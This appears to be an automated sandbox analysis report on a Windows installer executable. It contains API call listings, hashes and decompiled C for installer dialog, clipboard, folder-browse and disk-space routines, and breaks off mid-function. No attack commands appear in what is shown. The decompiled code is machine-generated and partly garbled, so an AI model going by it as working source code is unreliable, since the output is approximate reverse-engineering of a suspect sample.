                                                  0x00404979
                                                  0x00404979
                                                  0x0040497f
                                                  0x00404985
                                                  0x00404988
                                                  0x0040498e
                                                  0x0040498f
                                                  0x00404994
                                                  0x0040499d
                                                  0x004049a4
                                                  0x004049a7
                                                  0x004049aa
                                                  0x004049ad
                                                  0x004049e7
                                                  0x004049e9
                                                  0x00404a12
                                                  0x004049eb
                                                  0x004049f8
                                                  0x004049f8
                                                  0x004049af
                                                  0x004049b2
                                                  0x004049c1
                                                  0x004049cb
                                                  0x004049d3
                                                  0x004049da
                                                  0x004049e2
                                                  0x004049e2
                                                  0x004049ad
                                                  0x00404a18
                                                  0x00404a19
                                                  0x00404a1f
                                                  0x00404a25
                                                  0x00404a25
                                                  0x00404a32
                                                  0x00404a4d
                                                  0x00404a51
                                                  0x00404a6e
                                                  0x00404a73
                                                  0x00404a76
                                                  0x00404a76
                                                  0x00000000
                                                  0x00404a53
                                                  0x00404a58
                                                  0x00404a61
                                                  0x00404dee
                                                  0x00404e00
                                                  0x00404e00
                                                  0x00404a51
                                                  0x00000000
                                                  0x00404a32
                                                  0x0040496a

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404819
                                                  • GetDlgItem.USER32 ref: 00404826
                                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
                                                  • LoadBitmapA.USER32 ref: 00404885
                                                  • SetWindowLongA.USER32 ref: 0040489F
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                  • DeleteObject.GDI32(?), ref: 004048FF
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                  • GetWindowLongA.USER32 ref: 00404A39
                                                  • SetWindowLongA.USER32 ref: 00404A47
                                                  • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                  • GlobalFree.KERNEL32 ref: 00404C44
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                  • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                  • GetDlgItem.USER32 ref: 00404DE5
                                                  • ShowWindow.USER32(00000000), ref: 00404DEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$Xy$z=z
                                                  • API String ID: 1638840714-320808487
                                                  • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                  • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                  • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                  • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                  				struct HWND__* _v8;
                                                  				long _v12;
                                                  				struct tagRECT _v28;
                                                  				void* _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				void* _v60;
                                                  				void* _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t87;
                                                  				unsigned int _t92;
                                                  				unsigned int _t93;
                                                  				int _t94;
                                                  				int _t95;
                                                  				long _t98;
                                                  				void* _t101;
                                                  				intOrPtr _t123;
                                                  				struct HWND__* _t127;
                                                  				int _t149;
                                                  				int _t150;
                                                  				struct HWND__* _t154;
                                                  				struct HWND__* _t158;
                                                  				struct HMENU__* _t160;
                                                  				long _t162;
                                                  				void* _t163;
                                                  				short* _t164;
                                                  
                                                  				_t154 =  *0x42e404; // 0x0
                                                  				_t149 = 0;
                                                  				_v8 = _t154;
                                                  				if(_a8 != 0x110) {
                                                  					__eflags = _a8 - 0x405;
                                                  					if(_a8 == 0x405) {
                                                  						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                  					}
                                                  					__eflags = _a8 - 0x111;
                                                  					if(_a8 != 0x111) {
                                                  						L17:
                                                  						__eflags = _a8 - 0x404;
                                                  						if(_a8 != 0x404) {
                                                  							L25:
                                                  							__eflags = _a8 - 0x7b;
                                                  							if(_a8 != 0x7b) {
                                                  								goto L20;
                                                  							}
                                                  							__eflags = _a12 - _t154;
                                                  							if(_a12 != _t154) {
                                                  								goto L20;
                                                  							}
                                                  							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                  							__eflags = _t87 - _t149;
                                                  							_a8 = _t87;
                                                  							if(_t87 <= _t149) {
                                                  								L37:
                                                  								return 0;
                                                  							}
                                                  							_t160 = CreatePopupMenu();
                                                  							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                  							_t92 = _a16;
                                                  							__eflags = _t92 - 0xffffffff;
                                                  							if(_t92 != 0xffffffff) {
                                                  								_t150 = _t92;
                                                  								_t93 = _t92 >> 0x10;
                                                  								__eflags = _t93;
                                                  								_t94 = _t93;
                                                  							} else {
                                                  								GetWindowRect(_t154,  &_v28);
                                                  								_t150 = _v28.left;
                                                  								_t94 = _v28.top;
                                                  							}
                                                  							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                  							_t162 = 1;
                                                  							__eflags = _t95 - 1;
                                                  							if(_t95 == 1) {
                                                  								_v60 = _t149;
                                                  								_v48 = 0x42a0a0;
                                                  								_v44 = 0xfff;
                                                  								_a4 = _a8;
                                                  								do {
                                                  									_a4 = _a4 - 1;
                                                  									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                  									__eflags = _a4 - _t149;
                                                  									_t162 = _t162 + _t98 + 2;
                                                  								} while (_a4 != _t149);
                                                  								OpenClipboard(_t149);
                                                  								EmptyClipboard();
                                                  								_t101 = GlobalAlloc(0x42, _t162);
                                                  								_a4 = _t101;
                                                  								_t163 = GlobalLock(_t101);
                                                  								do {
                                                  									_v48 = _t163;
                                                  									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                  									 *_t164 = 0xa0d;
                                                  									_t163 = _t164 + 2;
                                                  									_t149 = _t149 + 1;
                                                  									__eflags = _t149 - _a8;
                                                  								} while (_t149 < _a8);
                                                  								GlobalUnlock(_a4);
                                                  								SetClipboardData(1, _a4);
                                                  								CloseClipboard();
                                                  							}
                                                  							goto L37;
                                                  						}
                                                  						__eflags =  *0x42e3ec - _t149; // 0x0
                                                  						if(__eflags == 0) {
                                                  							ShowWindow( *0x42ec28, 8);
                                                  							__eflags =  *0x42ecac - _t149; // 0x0
                                                  							if(__eflags == 0) {
                                                  								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
                                                  							}
                                                  							E00403E5C(1);
                                                  							goto L25;
                                                  						}
                                                  						 *0x429468 = 2;
                                                  						E00403E5C(0x78);
                                                  						goto L20;
                                                  					} else {
                                                  						__eflags = _a12 - 0x403;
                                                  						if(_a12 != 0x403) {
                                                  							L20:
                                                  							return E00403EEA(_a8, _a12, _a16);
                                                  						}
                                                  						ShowWindow( *0x42e3f0, _t149);
                                                  						ShowWindow(_t154, 8);
                                                  						E00403EB8(_t154);
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				_v52 = _v52 | 0xffffffff;
                                                  				_v40 = _v40 | 0xffffffff;
                                                  				_v60 = 2;
                                                  				_v56 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t123 =  *0x42ec30; // 0x79ee58
                                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                  				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
                                                  				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
                                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                                  				 *0x42e404 = _t127;
                                                  				_v8 = _t127;
                                                  				E00403EB8( *0x42e3f0);
                                                  				 *0x42e3f4 = E00404755(4);
                                                  				 *0x42e40c = 0;
                                                  				GetClientRect(_v8,  &_v28);
                                                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                  				if(_a8 >= 0) {
                                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                                  				}
                                                  				if(_a12 >= _t149) {
                                                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                  				}
                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  				_push(0x1b);
                                                  				E00403E83(_a4);
                                                  				if(( *0x42ec38 & 0x00000003) != 0) {
                                                  					ShowWindow( *0x42e3f0, _t149);
                                                  					if(( *0x42ec38 & 0x00000002) != 0) {
                                                  						 *0x42e3f0 = _t149;
                                                  					} else {
                                                  						ShowWindow(_v8, 8);
                                                  					}
                                                  					E00403EB8( *0x42e3e8);
                                                  				}
                                                  				_t158 = GetDlgItem(_a4, 0x3ec);
                                                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                  				if(( *0x42ec38 & 0x00000004) != 0) {
                                                  					SendMessageA(_t158, 0x409, _t149, _a12);
                                                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                  				}
                                                  				goto L37;
                                                  			}

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405050
                                                  • GetDlgItem.USER32 ref: 0040505F
                                                  • GetClientRect.USER32 ref: 0040509C
                                                  • GetSystemMetrics.USER32 ref: 004050A4
                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405140
                                                  • GetDlgItem.USER32 ref: 00405161
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                  • GetDlgItem.USER32 ref: 0040506E
                                                    • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                  • GetDlgItem.USER32 ref: 004051B3
                                                  • CreateThread.KERNEL32 ref: 004051C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                  • ShowWindow.USER32(00000000), ref: 004051EC
                                                  • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                  • ShowWindow.USER32(00000008), ref: 00405238
                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                  • CreatePopupMenu.USER32 ref: 0040527B
                                                  • AppendMenuA.USER32 ref: 00405290
                                                  • GetWindowRect.USER32 ref: 004052A3
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                  • OpenClipboard.USER32(00000000), ref: 00405312
                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                  • GlobalLock.KERNEL32 ref: 0040532B
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                  • SetClipboardData.USER32 ref: 00405362
                                                  • CloseClipboard.USER32 ref: 00405368
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: Xy${
                                                  • API String ID: 590372296-2060763830
                                                  • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                  • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                  • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                  • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Find$DocumentationFileProperty@16Themelstrcpy$CloseFirstNextlstrcatlstrlenwsprintf
                                                  • String ID: %s%s\%s.msstyles$(%s,%p,%p)$*.*$\$callback ended enum$callback(%s,%s,%s,%p)$displayname$searching %s$tooltip
                                                  • API String ID: 1093529425-3477817093
                                                  • Opcode ID: 75856c09a81ac6fab3befac2db50ced1be7b1cd96edcb0a82833ad9516c0886d
                                                  • Instruction ID: 514d53d8cc4ac7ab734e02283ca8a6bcbef22cfd117cd8304a169832f85f3fc2
                                                  • Opcode Fuzzy Hash: 75856c09a81ac6fab3befac2db50ced1be7b1cd96edcb0a82833ad9516c0886d
                                                  • Instruction Fuzzy Hash: 83B1A5B4D087288FDB55DF24C98479DBBF4EB48340F4089AEE88D93251DB74AA84CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				long _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				long _v36;
                                                  				char _v40;
                                                  				unsigned int _v44;
                                                  				signed int _v48;
                                                  				CHAR* _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				CHAR* _v72;
                                                  				void _v76;
                                                  				struct HWND__* _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t82;
                                                  				long _t87;
                                                  				signed char* _t89;
                                                  				void* _t95;
                                                  				signed int _t96;
                                                  				int _t109;
                                                  				signed short _t114;
                                                  				signed int _t118;
                                                  				struct HWND__** _t122;
                                                  				intOrPtr _t124;
                                                  				intOrPtr* _t138;
                                                  				CHAR* _t146;
                                                  				intOrPtr _t147;
                                                  				unsigned int _t150;
                                                  				signed int _t152;
                                                  				unsigned int _t156;
                                                  				signed int _t158;
                                                  				signed int* _t159;
                                                  				struct HWND__* _t165;
                                                  				struct HWND__* _t166;
                                                  				int _t168;
                                                  				unsigned int _t197;
                                                  
                                                  				_t156 = __edx;
                                                  				_t82 =  *0x429870;
                                                  				_v32 = _t82;
                                                  				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                  				if(_a8 == 0x40b) {
                                                  					E0040546C(0x3fb, _t146);
                                                  					E00405E29(_t146);
                                                  				}
                                                  				_t166 = _a4;
                                                  				if(_a8 != 0x110) {
                                                  					L8:
                                                  					if(_a8 != 0x111) {
                                                  						L20:
                                                  						if(_a8 == 0x40f) {
                                                  							L22:
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_v12 = _v12 & 0x00000000;
                                                  							E0040546C(0x3fb, _t146);
                                                  							if(E0040579B(_t185, _t146) == 0) {
                                                  								_v8 = 1;
                                                  							}
                                                  							E00405BC7(0x429068, _t146);
                                                  							_t87 = E00405F57(1);
                                                  							_v16 = _t87;
                                                  							if(_t87 == 0) {
                                                  								L30:
                                                  								E00405BC7(0x429068, _t146);
                                                  								_t89 = E0040574E(0x429068);
                                                  								_t158 = 0;
                                                  								if(_t89 != 0) {
                                                  									 *_t89 =  *_t89 & 0x00000000;
                                                  								}
                                                  								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                  									goto L35;
                                                  								} else {
                                                  									_t168 = 0x400;
                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                  									asm("cdq");
                                                  									_v48 = _t109;
                                                  									_v44 = _t156;
                                                  									_v12 = 1;
                                                  									goto L36;
                                                  								}
                                                  							} else {
                                                  								_t159 = 0;
                                                  								if(0 == 0x429068) {
                                                  									goto L30;
                                                  								} else {
                                                  									goto L26;
                                                  								}
                                                  								while(1) {
                                                  									L26:
                                                  									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
                                                  									if(_t114 != 0) {
                                                  										break;
                                                  									}
                                                  									if(_t159 != 0) {
                                                  										 *_t159 =  *_t159 & _t114;
                                                  									}
                                                  									_t159 = E00405701(0x429068) - 1;
                                                  									 *_t159 = 0x5c;
                                                  									if(_t159 != 0x429068) {
                                                  										continue;
                                                  									} else {
                                                  										goto L30;
                                                  									}
                                                  								}
                                                  								_t150 = _v44;
                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                  								_v44 = _t150 >> 0xa;
                                                  								_v12 = 1;
                                                  								_t158 = 0;
                                                  								__eflags = 0;
                                                  								L35:
                                                  								_t168 = 0x400;
                                                  								L36:
                                                  								_t95 = E00404755(5);
                                                  								if(_v12 != _t158) {
                                                  									_t197 = _v44;
                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                  										_v8 = 2;
                                                  									}
                                                  								}
                                                  								_t147 =  *0x42e3fc; // 0x7a3d7a
                                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                  									E0040473D(0x3ff, 0xfffffffb, _t95);
                                                  									if(_v12 == _t158) {
                                                  										SetDlgItemTextA(_a4, _t168, 0x429058);
                                                  									} else {
                                                  										E00404678(_t168, 0xfffffffc, _v48, _v44);
                                                  									}
                                                  								}
                                                  								_t96 = _v8;
                                                  								 *0x42ecc4 = _t96;
                                                  								if(_t96 == _t158) {
                                                  									_v8 = E0040140B(7);
                                                  								}
                                                  								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                  									_v8 = _t158;
                                                  								}
                                                  								E00403EA5(0 | _v8 == _t158);
                                                  								if(_v8 == _t158 &&  *0x42a08c == _t158) {
                                                  									E00404256();
                                                  								}
                                                  								 *0x42a08c = _t158;
                                                  								goto L53;
                                                  							}
                                                  						}
                                                  						_t185 = _a8 - 0x405;
                                                  						if(_a8 != 0x405) {
                                                  							goto L53;
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					_t118 = _a12 & 0x0000ffff;
                                                  					if(_t118 != 0x3fb) {
                                                  						L12:
                                                  						if(_t118 == 0x3e9) {
                                                  							_t152 = 7;
                                                  							memset( &_v76, 0, _t152 << 2);
                                                  							_v80 = _t166;
                                                  							_v72 = 0x42a0a0;
                                                  							_v60 = E00404612;
                                                  							_v56 = _t146;
                                                  							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
                                                  							_t122 =  &_v80;
                                                  							_v64 = 0x41;
                                                  							__imp__SHBrowseForFolderA(_t122);
                                                  							if(_t122 == 0) {
                                                  								_a8 = 0x40f;
                                                  							} else {
                                                  								__imp__CoTaskMemFree(_t122);
                                                  								E004056BA(_t146);
                                                  								_t124 =  *0x42ec30; // 0x79ee58
                                                  								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                  								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                  									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
                                                  									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
                                                  										lstrcatA(_t146, 0x42dbc0);
                                                  									}
                                                  								}
                                                  								 *0x42a08c =  *0x42a08c + 1;
                                                  								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					if(_a12 >> 0x10 != 0x300) {
                                                  						goto L53;
                                                  					}
                                                  					_a8 = 0x40f;
                                                  					goto L12;
                                                  				} else {
                                                  					_t165 = GetDlgItem(_t166, 0x3fb);
                                                  					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
                                                  						E004056BA(_t146);
                                                  					}
                                                  					 *0x42e3f8 = _t166;
                                                  					SetWindowTextA(_t165, _t146);
                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                  					_push(1);
                                                  					E00403E83(_t166);
                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  					_push(0x14);
                                                  					E00403E83(_t166);
                                                  					E00403EB8(_t165);
                                                  					_t138 = E00405F57(0xa);
                                                  					if(_t138 == 0) {
                                                  						L53:
                                                  						return E00403EEA(_a8, _a12, _a16);
                                                  					} else {
                                                  						 *_t138(_t165, 1);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}















































                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404310
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                  • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                  • lstrcmpiA.KERNEL32(rtrystwqtc,0042A0A0,00000000,?,?), ref: 00404428
                                                  • lstrcatA.KERNEL32(?,rtrystwqtc), ref: 00404434
                                                  • SetDlgItemTextA.USER32 ref: 00404446
                                                    • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                    • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                  • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                    • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                    • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                    • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Temp$Xy$rtrystwqtc$z=z
                                                  • API String ID: 2624150263-1990542941
                                                  • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                  • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                  • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                  • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E00402053() {
                                                  				void* _t44;
                                                  				intOrPtr* _t48;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t52;
                                                  				intOrPtr* _t54;
                                                  				signed int _t58;
                                                  				intOrPtr* _t59;
                                                  				intOrPtr* _t62;
                                                  				intOrPtr* _t64;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				int _t75;
                                                  				signed int _t81;
                                                  				intOrPtr* _t88;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t100;
                                                  
                                                  				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                                  				_t96 = E00402A29(0xffffffdf);
                                                  				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                                  				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                                  				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                                  				if(E00405727(_t96) == 0) {
                                                  					E00402A29(0x21);
                                                  				}
                                                  				_t44 = _t100 + 8;
                                                  				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
                                                  				if(_t44 < _t75) {
                                                  					L13:
                                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                  					_push(0xfffffff0);
                                                  				} else {
                                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
                                                  					if(_t95 >= _t75) {
